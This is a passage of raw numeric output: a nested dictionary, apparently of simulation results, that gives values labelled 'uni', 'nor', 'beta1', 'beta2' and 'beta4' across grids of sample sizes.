0.7254202434608807, 'beta2': 1.3850934656667797, 'beta4': 0.6253567875211119}, 150: {'uni': 0.7464000130882479, 'nor': 0.82772600390256, 'beta1': 0.748717836598423, 'beta2': 1.2348711064861624, 'beta4': 0.6676094543272186}, 100: {'uni': 0.7406116313995137, 'nor': 0.7846559695042307, 'beta1': 0.7436305573461189, 'beta2': 1.058180498214777, 'beta4': 0.6960649268744108}, 75: {'uni': 0.7336661138941689, 'nor': 0.7752977113565671, 'beta1': 0.7119633999030476, 'beta2': 0.9638602094125377, 'beta4': 0.7106380565315166}, 50: {'uni': 0.7274345032232149, 'nor': 0.7769370576160674, 'beta1': 0.7283032566959488, 'beta2': 0.9082889542215573, 'beta4': 0.7042713454877574}, 30: {'uni': 
0.71539271539834, 'nor': 0.7636883535575116, 'beta1': 0.7265786350524956, 'beta2': 0.8451376503815184, 'beta4': 0.7172879038073893}, 20: {'uni': 0.7278822712528917, 'nor': 0.7329383859926495, 'beta1': 0.7426269815726088, 'beta2': 0.7846227593442195, 'beta4': 0.7144990540387691}, 10: {'uni': 0.7131138660193919, 'nor': 0.7161480646534595, 'beta1': 0.6990538369629343, 'beta2': 0.7376189274957015, 'beta4': 0.7088112725925363}}, 750: {1000: {'uni': 0.7514448328173757, 'nor': 1.5690434935428623, 'beta1': 0.7238769915288217, 'beta2': 4.38682423614769, 'beta4': 0.4524323542299279}, 750: {'uni': 0.7455825696325514, 'nor': 1.3328601960899922, 'beta1': 0.7438570163136006, 'beta2': 3.355424284560506, 'beta4': 0.4758585436464304}, 500: {'uni': 0.7330809665950883, 'nor': 1.135828118704559, 'beta1': 0.7459578036681647, 'beta2': 2.338558656779778, 'beta4': 0.543469912113142}, 400: {'uni': 0.7393601770653746, 'nor': 1.052047627034842, 'beta1': 0.7600197916673754, 'beta2': 2.1262388399145316, 'beta4': 0.5680920375709674}, 300: {'uni': 0.733890553738948, 'nor': 0.9951567989849669, 'beta1': 0.7491899564747048, 'beta2': 1.7142789768265858, 'beta4': 0.5873317180036289}, 200: {'uni': 0.7173225588019696, 'nor': 0.9241399821663433, 'beta1': 0.7167646128108208, 'beta2': 1.398836761053942, 'beta4': 0.6156346475851152}, 150: {'uni': 0.7552102082425654, 'nor': 0.8640953826991624, 'beta1': 0.770371701027368, 'beta2': 1.2233959927790403, 'beta4': 0.6696303297293811}, 100: {'uni': 0.7586001636448041, 'nor': 0.8265445942127733, 'beta1': 0.7298586370318658, 'beta2': 1.0788951673020957, 'beta4': 0.6819565674039529}, 75: {'uni': 0.7339719193619441, 'nor': 0.7970213915919653, 'beta1': 0.7452981007326952, 'beta2': 0.9902033388465475, 'beta4': 0.6806705721923305}, 50: {'uni': 0.7426285460991999, 'nor': 0.784823983472302, 'beta1': 0.7328375072176379, 'beta2': 0.8989778928787314, 'beta4': 0.714999119165653}, 30: {'uni': 0.7540507423640944, 'nor': 0.7582186672393878, 'beta1': 0.7339734090546394, 'beta2': 
0.8529443603173799, 'beta4': 0.7059507241941045}, 20: {'uni': 0.7201249000817622, 'nor': 0.7617493220181438, 'beta1': 0.7349074815395348, 'beta2': 0.7881594314228356, 'beta4': 0.7196526975796932}, 10: {'uni': 0.7153409619896742, 'nor': 0.7224788626089845, 'beta1': 0.7017555851627001, 'beta2': 0.7359482321541709, 'beta4': 0.685808672984458}}, 500: {1000: {'uni': 0.7380604623841498, 'nor': 2.0074921408234596, 'beta1': 0.7259149617361781, 'beta2': 5.1534725835867174, 'beta4': 0.4016185019025364}, 750: {'uni': 0.7277313960695746, 'nor': 1.6968624841848041, 'beta1': 0.7395120438274015, 'beta2': 4.0638408872213905, 'beta4': 0.4252262089873473}, 500: {'uni': 0.7495634259353762, 'nor': 1.3803020407947926, 'beta1': 0.7247647863955615, 'beta2': 2.95719376036709, 'beta4': 0.48637810148569965}, 400: {'uni': 0.7497722433163603, 'nor': 1.2589603075934335, 'beta1': 0.7439095820905751, 'beta2': 2.474926128760821, 'beta4': 0.49292747162383926}, 300: {'uni': 0.722253811511448, 'nor': 1.1061656778845381, 'beta1': 0.7387074468238296, 'beta2': 2.040531745372352, 'beta4': 0.5439583012238866}, 200: {'uni': 0.7419144634436707, 'nor': 0.9866019092605993, 'beta1': 0.7485409246569181, 'beta2': 1.6217964319106442, 'beta4': 0.5938407647627634}, 150: {'uni': 0.7507584514333536, 'nor': 0.9112256273611522, 'beta1': 0.7583144421101103, 'beta2': 1.4136429869481633, 'beta4': 0.6219493991981659}, 100: {'uni': 0.7483473641741184, 'nor': 0.8696982703928622, 'beta1': 0.7458470511513203, 'beta2': 1.1900733793640232, 'beta4': 0.6404674789644428}, 75: {'uni': 0.7581297777885967, 'nor': 0.8098297138565111, 'beta1': 0.74147568796388, 'beta2': 1.036728255630718, 'beta4': 0.6638886698880033}, 50: {'uni': 0.7277428656725512, 'nor': 0.8328795823416434, 'beta1': 0.7504227439834543, 'beta2': 0.9543372753583443, 'beta4': 0.6832013312974475}, 30: {'uni': 0.7544258542081878, 'nor': 0.768097419973158, 'beta1': 0.7167797119759898, 'beta2': 0.8583509524300639, 'beta4': 0.6852309446092829}, 20: {'uni': 
0.7254031250497417, 'nor': 0.7362340759894164, 'beta1': 0.7389112075834917, 'beta2': 0.8164314073450918, 'beta4': 0.7063892945802895}, 10: {'uni': 0.6955262901599432, 'nor': 0.7142489442262036, 'beta1': 0.6994344581806992, 'beta2': 0.750942354002658, 'beta4': 0.7099403799059699}}, 400: {1000: {'uni': 0.7364502180846917, 'nor': 2.284553312869663, 'beta1': 0.7541341170458651, 'beta2': 5.0818747242235025, 'beta4': 0.3900704329365574}, 750: {'uni': 0.7504698065388657, 'nor': 1.938239865343596, 'beta1': 0.7769598575433235, 'beta2': 4.01597780597472, 'beta4': 0.40395786312151927}, 500: {'uni': 0.7508573312104527, 'nor': 1.5072813162623548, 'beta1': 0.7305280496529544, 'beta2': 2.857026217797966, 'beta4': 0.4547828036658211}, 400: {'uni': 0.7611248206328712, 'nor': 1.338550267958856, 'beta1': 0.7466143672126452, 'beta2': 2.5495916012797935, 'beta4': 0.4969149207948216}, 300: {'uni': 0.7424343806561035, 'nor': 1.231111156552096, 'beta1': 0.7344575668422653, 'beta2': 2.0773636667154585, 'beta4': 0.5079339216262199}, 200: {'uni': 0.7392633158240819, 'nor': 1.0377847828667477, 'beta1': 0.7586003850660703, 'beta2': 1.6153253239719372, 'beta4': 0.5722234547809886}, 150: {'uni': 0.7391428468766339, 'nor': 0.9949906865630406, 'beta1': 0.7379552345583523, 'beta2': 1.3631500709552795, 'beta4': 0.619870387049708}, 100: {'uni': 0.7356451707387796, 'nor': 0.9291460091070943, 'beta1': 0.7404914473665879, 'beta2': 1.2174882328266758, 'beta4': 0.6262899546773785}, 75: {'uni': 0.7623057151977248, 'nor': 0.8361834398991281, 'beta1': 0.7501586532707593, 'beta2': 1.0872819013301396, 'beta4': 0.6478743366728121}, 50: {'uni': 0.74349850126654, 'nor': 0.8384065389830003, 'beta1': 0.7220703818527061, 'beta2': 0.9340745921343401, 'beta4': 0.6850260219180698}, 30: {'uni': 0.7149500790277772, 'nor': 0.7885112065199036, 'beta1': 0.7213375663568558, 'beta2': 0.8600427555686836, 'beta4': 0.6912613993017295}, 20: {'uni': 0.7221206453316641, 'nor': 0.7460966134674923, 'beta1': 0.7136641113944505, 
'beta2': 0.8041327522868057, 'beta4': 0.7046152214673151}, 10: {'uni': 0.7078401582681484, 'nor': 0.7403186043135705, 'beta1': 0.7050250617326397, 'beta2': 0.7383220943967499, 'beta4': 0.6845552561458373}}, 300: {1000: {'uni': 0.7206526844832443, 'nor': 2.7942842452599153, 'beta1': 0.7527628702986627, 'beta2': 5.919411684201717, 'beta4': 0.3670485782403558}, 750: {'uni': 0.7509904630876584, 'nor': 2.2739045920462093, 'beta1': 0.7349341918106195, 'beta2': 4.652614303744448, 'beta4': 0.38740876912159744}, 500: {'uni': 0.7326172812992321, 'nor': 1.790945500928653, 'beta1': 0.763447968796166, 'beta2': 3.2504723882846553, 'beta4': 0.43389149620567713}, 400: {'uni': 0.7346001289882709, 'nor': 1.6118801882818838, 'beta1': 0.7632362935242065, 'beta2': 2.715944059333255, 'beta4': 0.44766620539659857}, 300: {'uni': 0.7427068448325751, 'nor': 1.4193407381871972, 'beta1': 0.72901308536521, 'beta2': 2.2921763593149125, 'beta4': 0.47478159208735254}, 200: {'uni': 0.7372729090295441, 'nor': 1.159679435034981, 'beta1': 0.7510674151033424, 'beta2': 1.8423392212461573, 'beta4': 0.526324417635601}, 150: {'uni': 0.7335555313519704, 'nor': 1.0189459141945576, 'beta1': 0.7774470798853989, 'beta2': 1.5526247983720354, 'beta4': 0.552793650767243}, 100: {'uni': 0.7525668267368835, 'nor': 0.9300778141862717, 'beta1': 0.7349045453993331, 'beta2': 1.2690620927247336, 'beta4': 0.6069832998899233}, 75: {'uni': 0.7398060192576016, 'nor': 0.8937269970573645, 'beta1': 0.7367240662850367, 'beta2': 1.114837775599423, 'beta4': 0.6227770244286678}, 50: {'uni': 0.7361907104794088, 'nor': 0.8467145891887228, 'beta1': 0.7532248025351025, 'beta2': 1.0076451242544675, 'beta4': 0.6677669182736204}, 30: {'uni': 0.7504149824828716, 'nor': 0.8049349990129249, 'beta1': 0.7188773766156613, 'beta2': 0.8917913915287613, 'beta4': 0.7002165400571294}, 20: {'uni': 0.7314574140964747, 'nor': 0.7817553909991105, 'beta1': 0.7162634938969795, 'beta2': 0.8408597207849396, 'beta4': 0.7160054524790228}, 10: {'uni': 
0.7073627129526159, 'nor': 0.7221863363680757, 'beta1': 0.7204609453804969, 'beta2': 0.7558169384121463, 'beta4': 0.6931495140186302}}, 200: {1000: {'uni': 0.7423323084504223, 'nor': 3.9465111422421497, 'beta1': 0.748201229654901, 'beta2': 7.332126221988379, 'beta4': 0.3501525587156131}, 750: {'uni': 0.746653717649964, 'nor': 3.1892224661604938, 'beta1': 0.7624407304753418, 'beta2': 5.59235179871814, 'beta4': 0.34982032353631515}, 500: {'uni': 0.7357674078649882, 'nor': 2.251598080951371, 'beta1': 0.7423612184099468, 'beta2': 4.175521005731495, 'beta4': 0.3839217818127895}, 400: {'uni': 0.7395885933950936, 'nor': 2.0424085994835663, 'beta1': 0.7406447160909883, 'beta2': 3.2932035132001656, 'beta4': 0.40297503998297585}, 300: {'uni': 0.7577043809971838, 'nor': 1.6443666764703977, 'beta1': 0.7421027397774597, 'beta2': 2.669410854117533, 'beta4': 0.4276531839131966}, 200: {'uni': 0.7180965904307356, 'nor': 1.407264604807638, 'beta1': 0.7286293957187439, 'beta2': 2.1069547544377403, 'beta4': 0.4870983132798874}, 150: {'uni': 0.7553350101995575, 'nor': 1.1871616066279893, 'beta1': 0.7462056699655844, 'beta2': 1.723221575954481, 'beta4': 0.5273487385508362}, 100: {'uni': 0.7395542668424886, 'nor': 1.040812175501304, 'beta1': 0.7217865304155312, 'beta2': 1.3998981782184052, 'beta4': 0.5719653577277595}, 75: {'uni': 0.7179822358907298, 'nor': 0.9798839747009375, 'beta1': 0.7359864694464765, 'beta2': 1.2271310762157386, 'beta4': 0.5871809308583475}, 50: {'uni': 0.7375146921181255, 'nor': 0.9002210975474763, 'beta1': 0.7393499748203317, 'beta2': 1.0775344882196805, 'beta4': 0.6290086191247244}, 30: {'uni': 0.7169870394193528, 'nor': 0.8158188517233516, 'beta1': 0.7493460184747783, 'beta2': 0.9221767471669186, 'beta4': 0.6549135945910195}, 20: {'uni': 0.73449559591477, 'nor': 0.7810180014458455, 'beta1': 0.7420682468640403, 'beta2': 0.8780748276924514, 'beta4': 0.6867888053047261}, 10: {'uni': 0.7053108649778468, 'nor': 0.7526353976401546, 'beta1': 0.7177991673630623, 
'beta2': 0.7604100266538812, 'beta4': 0.6792646013309229}}, 150: {1000: {'uni': 0.7743933245507701, 'nor': 4.870684976620477, 'beta1': 0.7493300795479252, 'beta2': 8.63035716657048, 'beta4': 0.338204647050127}, 750: {'uni': 0.7428327364622048, 'nor': 3.9085507502293373, 'beta1': 0.7529109429719044, 'beta2': 6.406659776251172, 'beta4': 0.3418060411939941}, 500: {'uni': 0.7331842699568302, 'nor': 2.8283847000054734, 'beta1': 0.7315010738620568, 'beta2': 4.49922268514765, 'beta4': 0.3652693771266238}, 400: {'uni': 0.7477876672889165, 'nor': 2.4408121466719894, 'beta1': 0.7486680909128302, 'beta2': 3.8227114105566447, 'beta4': 0.38605950916210385}, 300: {'uni': 0.7714775991116009, 'nor': 1.978646880908542, 'beta1': 0.7471424904471909, 'beta2': 3.044832497044965, 'beta4': 0.40485929874794896}, 200: {'uni': 0.731052318190657, 'nor': 1.6207811171212545, 'beta1': 0.7474999694752592, 'beta2': 2.2933245948022067, 'beta4': 0.46781899904078245}, 150: {'uni': 0.7500922612488313, 'nor': 1.3781581966330505, 'beta1': 0.7352960756488399, 'beta2': 1.9096599656675697, 'beta4': 0.4735125299169063}, 100: {'uni': 0.7279277122549193, 'nor': 1.1692830569706523, 'beta1': 0.7506006169362144, 'beta2': 1.5128965317553913, 'beta4': 0.5319456707433308}, 75: {'uni': 0.7325339806512801, 'nor': 1.0380383734066543, 'beta1': 0.7493119761616068, 'beta2': 1.343582314436481, 'beta4': 0.5737550750224671}, 50: {'uni': 0.7294430093006015, 'nor': 0.9505171237229544, 'beta1': 0.7510871675286181, 'beta2': 1.1329544178629671, 'beta4': 0.6122179404495601}, 30: {'uni': 0.7290644337093428, 'nor': 0.8806444792243782, 'beta1': 0.7296970766498079, 'beta2': 0.9661908520938478, 'beta4': 0.6575438710614618}, 20: {'uni': 0.7222168674984393, 'nor': 0.8420048253770901, 'beta1': 0.724515988463435, 'beta2': 0.8344804556030407, 'beta4': 0.660218564428112}, 10: {'uni': 0.7244918863210531, 'nor': 0.7443455406912518, 'beta1': 0.7195377603425277, 'beta2': 0.7882387387152024, 'beta4': 0.6599711359961713}}, 100: {1000: {'uni': 
0.7553514817299303, 'nor': 7.1262210456290624, 'beta1': 0.7529581062774561, 'beta2': 10.253475634536954, 'beta4': 0.3192243144730889}, 750: {'uni': 0.7791294423924775, 'nor': 5.549089935079821, 'beta1': 0.7456036542941434, 'beta2': 7.819101615055815, 'beta4': 0.3181125557346874}, 500: {'uni': 0.7464390747429561, 'nor': 4.023411042911893, 'beta1': 0.719440888915879, 'beta2': 5.393933864641589, 'beta4': 0.3363492806120328}, 400: {'uni': 0.7436820550413948, 'nor': 3.2416913521011184, 'beta1': 0.7474703825572615, 'beta2': 4.366868426716757, 'beta4': 0.34793866437043924}, 300: {'uni': 0.7509432095906787, 'nor': 2.7020137466001795, 'beta1': 0.7409014752879322, 'beta2': 3.421463063906572, 'beta4': 0.36853309485013414}, 200: {'uni': 0.7530374509678488, 'nor': 1.960926209464229, 'beta1': 0.7241407264763559, 'beta2': 2.5782704085356767, 'beta4': 0.4078004886476791}, 150: {'uni': 0.7303983087222535, 'nor': 1.7191618969045015, 'beta1': 0.7347216143259169, 'beta2': 2.1185263308351763, 'beta4': 0.43491143509457303}, 100: {'uni': 0.7257742244079696, 'nor': 1.3801969840551045, 'beta1': 0.7176852231223901, 'beta2': 1.642329425975999, 'beta4': 0.48139070090467456}, 75: {'uni': 0.7517164534931338, 'nor': 1.1818603840334319, 'beta1': 0.7286890186729597, 'beta2': 1.4443184215810094, 'beta4': 0.5183068449522771}, 50: {'uni': 0.7621688606289894, 'nor': 1.0872999413300521, 'beta1': 0.7489827238342822, 'beta2': 1.1848949847718624, 'beta4': 0.5656741415128054}, 30: {'uni': 0.7298084592363608, 'nor': 0.9332998548420763, 'beta1': 0.7387444178885003, 'beta2': 1.0252251878747998, 'beta4': 0.6210582954782421}, 20: {'uni': 0.7441136225233612, 'nor': 0.8527112995573832, 'beta1': 0.7462672248306345, 'beta2': 0.913108948983176, 'beta4': 0.640746443418552}, 10: {'uni': 0.737481767799042, 'nor': 0.7654531340705115, 'beta1': 0.7209580518994956, 'beta2': 0.7703295902259096, 'beta4': 0.6595379429157052}}, 75: {1000: {'uni': 0.8074067248637035, 'nor': 8.982703727613933, 'beta1': 0.7462766315317871, 
'beta2': 11.863615971347793, 'beta4': 0.30969669346453244}, 750: {'uni': 0.7905502080924112, 'nor': 7.0625027723964555, 'beta1': 0.7385904561393585, 'beta2': 8.813594802870487, 'beta4': 0.3083689380574924}, 500: {'uni': 0.7664044582012062, 'nor': 5.092979689603615, 'beta1': 0.734519756167919, 'beta2': 5.915617089146454, 'beta4': 0.32579897334383345}, 400: {'uni': 0.7643419874704518, 'nor': 4.082652680068739, 'beta1': 0.7280388893196177, 'beta2': 4.9326418878616085, 'beta4': 0.3443768536878751}, 300: {'uni': 0.7578970756907041, 'nor': 3.305189980415632, 'beta1': 0.7535727790132047, 'beta2': 3.8986893775132603, 'beta4': 0.3523585783087568}, 200: {'uni': 0.7627668279519347, 'nor': 2.366352321461588, 'beta1': 0.7478063096454467, 'beta2': 2.774930336104137, 'beta4': 0.37895595523501135}, 150: {'uni': 0.7551498483242116, 'nor': 2.0146806648840867, 'beta1': 0.715322504892067, 'beta2': 2.27236351355193, 'beta4': 0.4024298445706972}, 100: {'uni': 0.7394637596741217, 'nor': 1.526892470851258, 'beta1': 0.7534285806985298, 'beta2': 1.7401398926989977, 'beta4': 0.4449932415566237}, 75: {'uni': 0.7489504482916669, 'nor': 1.4189660002627995, 'beta1': 0.7590111719264389, 'beta2': 1.4816546253016176, 'beta4': 0.4799916438012694}, 50: {'uni': 0.7231634928736738, 'nor': 1.1665468171368905, 'beta1': 0.7205514516102951, 'beta2': 1.246946632314395, 'beta4': 0.528271236289555}, 30: {'uni': 0.6919736066483383, 'nor': 0.9752350712342117, 'beta1': 0.7326947145486271, 'beta2': 1.017214779212776, 'beta4': 0.6056915196333973}, 20: {'uni': 0.7321248137346815, 'nor': 0.8847322215404421, 'beta1': 0.7436111945765038, 'beta2': 0.9369344506464795, 'beta4': 0.6038200746587884}, 10: {'uni': 0.6999936271725347, 'nor': 0.8176052890572043, 'beta1': 0.7414589395343638, 'beta2': 0.7860543175475491, 'beta4': 0.6658013359881663}}, 50: {1000: {'uni': 0.9349315291336215, 'nor': 13.43691200121997, 'beta1': 0.7415667280225452, 'beta2': 14.529533357585608, 'beta4': 0.3020722643250528}, 750: {'uni': 
0.8664297277263152, 'nor': 10.124177956990547, 'beta1': 0.7325637726044728, 'beta2': 10.705574218801685, 'beta4': 0.312164534002672}, 500: {'uni': 0.8012745715384612, 'nor': 7.101608627678545, 'beta1': 0.7482701388420466, 'beta2': 7.331886152921014, 'beta4': 0.3132485584859663}, 400: {'uni': 0.7993068988068693, 'nor': 5.876195499992661, 'beta1': 0.7360457214123197, 'beta2': 5.958198160314339, 'beta4': 0.3272571358134039}, 300: {'uni': 0.7699389442266666, 'nor': 4.551685320466588, 'beta1': 0.7579543434178201, 'beta2': 4.754383485607729, 'beta4': 0.33214677485760385}, 200: {'uni': 0.7737453062936557, 'nor': 3.2743330060587614, 'beta1': 0.7467458291008919, 'beta2': 3.3223709289687107, 'beta4': 0.35436399242374406}, 150: {'uni': 0.7490417235906979, 'nor': 2.6767446787215903, 'beta1': 0.7422159085910014, 'beta2': 2.644746427650133, 'beta4': 0.3714173165341442}, 100: {'uni': 0.7313624526865553, 'nor': 1.9870868548615173, 'beta1': 0.7285126816888758, 'beta2': 2.001888568131041, 'beta4': 0.3952418926791647}, 75: {'uni': 0.7172671987386803, 'nor': 1.6644805287512636, 'beta1': 0.7378322413195023, 'beta2': 1.7028170741593902, 'beta4': 0.43605827899361954}, 50: {'uni': 0.7253230461458138, 'nor': 1.3592272923869326, 'beta1': 0.7452200834032827, 'beta2': 1.3910336399973648, 'beta4': 0.48237565357444456}, 30: {'uni': 0.70803267861597, 'nor': 1.1549808891273663, 'beta1': 0.7232959969444372, 'beta2': 1.0990097769678915, 'beta4': 0.5413580844578947}, 20: {'uni': 0.7363216314094163, 'nor': 0.9876308421952716, 'beta1': 0.7438260730972865, 'beta2': 0.9306032071823038, 'beta4': 0.5831508780013659}, 10: {'uni': 0.7023687035868975, 'nor': 0.8443556631337041, 'beta1': 0.7158289089041515, 'beta2': 0.8017849117678024, 'beta4': 0.6252855701087432}}, 30: {1000: {'uni': 1.135433662003403, 'nor': 22.975611110150748, 'beta1': 0.7573893837030105, 'beta2': 17.74359800346252, 'beta4': 0.297757902293249}, 750: {'uni': 1.0311045283721894, 'nor': 16.483343618177887, 'beta1': 0.7534113622478869, 
'beta2': 13.482644094659875, 'beta4': 0.30160940624087845}, 500: {'uni': 0.9139362430769883, 'nor': 11.705414821489235, 'beta1': 0.7484586324824043, 'beta2': 9.438769937249091, 'beta4': 0.3069397480593394}, 400: {'uni': 0.8855972092427258, 'nor': 9.037255267934396, 'beta1': 0.7733590733817911, 'beta2': 7.576713118210859, 'beta4': 0.3152328706658135}, 300: {'uni': 0.8498607707121014, 'nor': 7.206132571959497, 'beta1': 0.7418514574998677, 'beta2': 5.530582974473799, 'beta4': 0.31689463862324563}, 200: {'uni': 0.7917662970649914, 'nor': 5.077848982496681, 'beta1': 0.7304678805443476, 'beta2': 4.204779606913517, 'beta4': 0.3278334953907271}, 150: {'uni': 0.7910806456951968, 'nor': 4.004868875294406, 'beta1': 0.7261505015937928, 'beta2': 3.2079402231129976, 'beta4': 0.3447490181814188}, 100: {'uni': 0.7696591554811341, 'nor': 2.8972005461946866, 'beta1': 0.7297127847288362, 'beta2': 2.3363724000389023, 'beta4': 0.35895086880667004}, 75: {'uni': 0.7363424176614078, 'nor': 2.369420393366632, 'beta1': 0.7526904627618415, 'beta2': 1.9306149063833873, 'beta4': 0.3874230408263742}, 50: {'uni': 0.7096140875475437, 'nor': 1.792450944189413, 'beta1': 0.7162393369797683, 'beta2': 1.4435381512650722, 'beta4': 0.4180218110706144}, 30: {'uni': 0.6993735822894044, 'nor': 1.381219120953892, 'beta1': 0.7092864199251419, 'beta2': 1.1978302897457505, 'beta4': 0.4927113098977276}, 20: {'uni': 0.6854105477122527, 'nor': 1.1684502381086352, 'beta1': 0.7297155809453436, 'beta2': 0.9860055568654263, 'beta4': 0.5218496571816182}, 10: {'uni': 0.6769793341065574, 'nor': 0.9298827298857523, 'beta1': 0.6991421468165611, 'beta2': 0.8384852567044772, 'beta4': 0.5911355331329511}}, 20: {1000: {'uni': 1.5422767881732407, 'nor': 33.623007842941036, 'beta1': 0.8076770761473828, 'beta2': 21.81645368130898, 'beta4': 0.29400214136669206}, 750: {'uni': 1.3565649257548582, 'nor': 25.500787968320108, 'beta1': 0.7836354489834423, 'beta2': 17.05613211546847, 'beta4': 0.2953552404790611}, 500: {'uni': 
1.1554066269622438, 'nor': 17.366509269093996, 'beta1': 0.7653357621752842, 'beta2': 11.45041336876129, 'beta4': 0.3037530374927966}, 400: {'uni': 1.0737530948566782, 'nor': 13.540388043219384, 'beta1': 0.7654090294473117, 'beta2': 9.518851192493647, 'beta4': 0.30367790135580414}, 300: {'uni': 0.9765351746747871, 'nor': 10.717684596621698, 'beta1': 0.7362009325282473, 'beta2': 7.150808242448672, 'beta4': 0.3124982191238184}, 200: {'uni': 0.9002188501928331, 'nor': 7.062770475092731, 'beta1': 0.7397883860335908, 'beta2': 4.777154184591877, 'beta4': 0.3159112478562884}, 150: {'uni': 0.8335790056399025, 'nor': 5.58483897460766, 'beta1': 0.7460132208826435, 'beta2': 3.7165330190336245, 'beta4': 0.31991308480594854}, 100: {'uni': 0.7937288019209847, 'nor': 3.9655772323210314, 'beta1': 0.7411963443373258, 'beta2': 2.7650571950679814, 'beta4': 0.3337932064372245}, 75: {'uni': 0.7633892696634527, 'nor': 3.175438383816786, 'beta1': 0.7017838867635625, 'beta2': 2.1935080303965084, 'beta4': 0.35892212583393873}, 50: {'uni': 0.727388616390112, 'nor': 2.3492749534444273, 'beta1': 0.7307786603085943, 'beta2': 1.6613293154255553, 'beta4': 0.3860365833166761}, 30: {'uni': 0.7221576207335421, 'nor': 1.7443088681216943, 'beta1': 0.7203994812969841, 'beta2': 1.228838728852705, 'beta4': 0.4307713330938513}, 20: {'uni': 0.7041433273507007, 'nor': 1.3875298207339808, 'beta1': 0.7244642373998895, 'beta2': 1.0943181325266345, 'beta4': 0.4811743703599059}, 10: {'uni': 0.7012223644343135, 'nor': 1.0245301878477195, 'beta1': 0.6986917466557336, 'beta2': 0.8714720199283585, 'beta4': 0.5538253794857232}}, 10: {1000: {'uni': 3.3860305779409425, 'nor': 69.12629967805236, 'beta1': 1.3311840432830941, 'beta2': 31.886608192512867, 'beta4': 0.30148004390899985}, 750: {'uni': 2.760308940939271, 'nor': 52.32712111436736, 'beta1': 1.1485351997801594, 'beta2': 23.88091780382947, 'beta4': 0.3007675448851966}, 500: {'uni': 2.1187788625497666, 'nor': 34.12244249918099, 'beta1': 0.9875632983483154, 'beta2': 
16.303450154076117, 'beta4': 0.29315714851845276}, 400: {'uni': 1.812743282248588, 'nor': 27.535347493750546, 'beta1': 0.9603589961065766, 'beta2': 12.942852748453202, 'beta4': 0.2995636993008456}, 300: {'uni': 1.5698543440275912, 'nor': 20.31822234635588, 'beta1': 0.868758435808308, 'beta2': 9.943250031735536, 'beta4': 0.2966653980441081}, 200: {'uni': 1.2831488048321131, 'nor': 14.727951422793442, 'beta1': 0.8356737691150327, 'beta2': 6.740556657840313, 'beta4': 0.2943697452228861}, 150: {'uni': 1.1268925713293234, 'nor': 10.597118226400635, 'beta1': 0.8108033084059241, 'beta2': 5.115279274356808, 'beta4': 0.31424178539635517}, 100: {'uni': 0.9635160740767054, 'nor': 7.301349015655083, 'beta1': 0.7560708487156951, 'beta2': 3.648381304348421, 'beta4': 0.3048069455780913}, 75: {'uni': 0.8838515573613532, 'nor': 5.74338502795036, 'beta1': 0.744462441212371, 'beta2': 2.818074827786014, 'beta4': 0.3212073081339402}, 50: {'uni': 0.8291338828064758, 'nor': 3.9533981841058488, 'beta1': 0.7380188306751617, 'beta2': 2.094258280901449, 'beta4': 0.3292230380642782}, 30: {'uni': 0.7644312433974103, 'nor': 2.720441186648777, 'beta1': 0.7113163970445261, 'beta2': 1.5020958427312148, 'beta4': 0.3621051408260878}, 20: {'uni': 0.7031423578740116, 'nor': 2.1168935580804584, 'beta1': 0.7043135043678577, 'beta2': 1.1671964551964154, 'beta4': 0.3941268196263035}, 10: {'uni': 0.6876344879848008, 'nor': 1.3628066525293088, 'beta1': 0.6874249300009232, 'beta2': 0.8861925569465577, 'beta4': 0.46282421765776804}}}, 0.1: {1000: {1000: {'uni': 0.34522862285111255, 'nor': 0.6228395073147752, 'beta1': 0.3491475301557177, 'beta2': 1.8016479493371311, 'beta4': 0.24424001680972462}, 750: {'uni': 0.34067029159943607, 'nor': 0.5499598659017021, 'beta1': 0.3486635011755686, 'beta2': 1.3479403032586368, 'beta4': 0.256937225000032}, 500: {'uni': 0.3464084343284053, 'nor': 0.47208323276435604, 'beta1': 0.3459987511001463, 'beta2': 0.9576128375739897, 'beta4': 0.2758735009645715}, 400: {'uni': 
0.3523467281914471, 'nor': 0.4515226651894629, 'beta1': 0.3519476796699666, 'beta2': 0.7978696641078354, 'beta4': 0.2864827600190153}, 300: {'uni': 0.3477454390980137, 'nor': 0.423596083058182, 'beta1': 0.3465963700708253, 'beta2': 0.6876688970007049, 'beta4': 0.2976169379574473}, 200: {'uni': 0.3445409313119668, 'nor': 0.4030581972395861, 'beta1': 0.3492651184466396, 'beta2': 0.5551933075253935, 'beta4': 0.31556439238679485}, 150: {'uni': 0.3498705624747738, 'nor': 0.3918102011857414, 'beta1': 0.3456677542317484, 'beta2': 0.49624702752060124, 'beta4': 0.3242273287196293}, 100: {'uni': 0.3436893083795591, 'nor': 0.37284776795342023, 'beta1': 0.34771284546605924, 'beta2': 0.4466105146595203, 'beta4': 0.32803306387910325}, 75: {'uni': 0.3475867160617753, 'nor': 0.36340645271259714, 'beta1': 0.34938185672749816, 'beta2': 0.4170327188966793, 'beta4': 0.32843949400931977}, 50: {'uni': 0.35055629128861204, 'nor': 0.35940286705773605, 'beta1': 0.34632894455437757, 'beta2': 0.3950444302670791, 'beta4': 0.3380127773421535}, 30: {'uni': 0.34398236878275323, 'nor': 0.3513554868714947, 'beta1': 0.34746531457584257, 'beta2': 0.37326172618762804, 'beta4': 0.3377301023189335}, 20: {'uni': 0.35212346707498915, 'nor': 0.3491050335472612, 'beta1': 0.33698617941167014, 'beta2': 0.36496711101835394, 'beta4': 0.3399147522136969}, 10: {'uni': 0.3455385083140642, 'nor': 0.3550667091655473, 'beta1': 0.3455192835205828, 'beta2': 0.3588059524171947, 'beta4': 0.34715372359343916}}, 750: {1000: {'uni': 0.34909526053327966, 'nor': 0.7000192716607003, 'beta1': 0.3436461639650576, 'beta2': 1.7826637593470094, 'beta4': 0.23043671233693377}, 750: {'uni': 0.3521350266061196, 'nor': 0.6065082789810716, 'beta1': 0.3477266969960249, 'beta2': 1.3463479370664821, 'beta4': 0.24140925534497648}, 500: {'uni': 0.3407122010380868, 'nor': 0.5269610372045576, 'beta1': 0.3460101335915343, 'beta2': 0.9369997288365739, 'beta4': 0.2617272822804359}, 400: {'uni': 0.34515571530717193, 'nor': 0.47877303335524596, 
